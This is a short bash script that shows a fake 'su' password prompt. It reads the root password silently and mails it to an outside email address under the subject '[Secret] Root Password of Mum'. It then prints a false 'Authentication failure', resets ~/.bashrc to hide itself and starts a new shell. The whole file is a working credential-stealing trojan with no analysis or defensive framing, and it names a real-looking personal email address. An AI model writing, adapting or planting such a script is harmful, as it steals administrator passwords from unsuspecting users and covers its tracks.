#!/bin/bash
hack_passwd(){
echo "Password:"
read -s passwd
#echo ${passwd} debug usage
mail -s "[Secret] Root Password of Mum" "kevin.zhang@sjtu.edu.cn" <<< ${passwd}
sleep 3
echo "su: Authentication failure"
}

#echo "test su"
hack_passwd
/bin/cp /etc/skel/.bashrc ~/
source /etc/environment
exec bash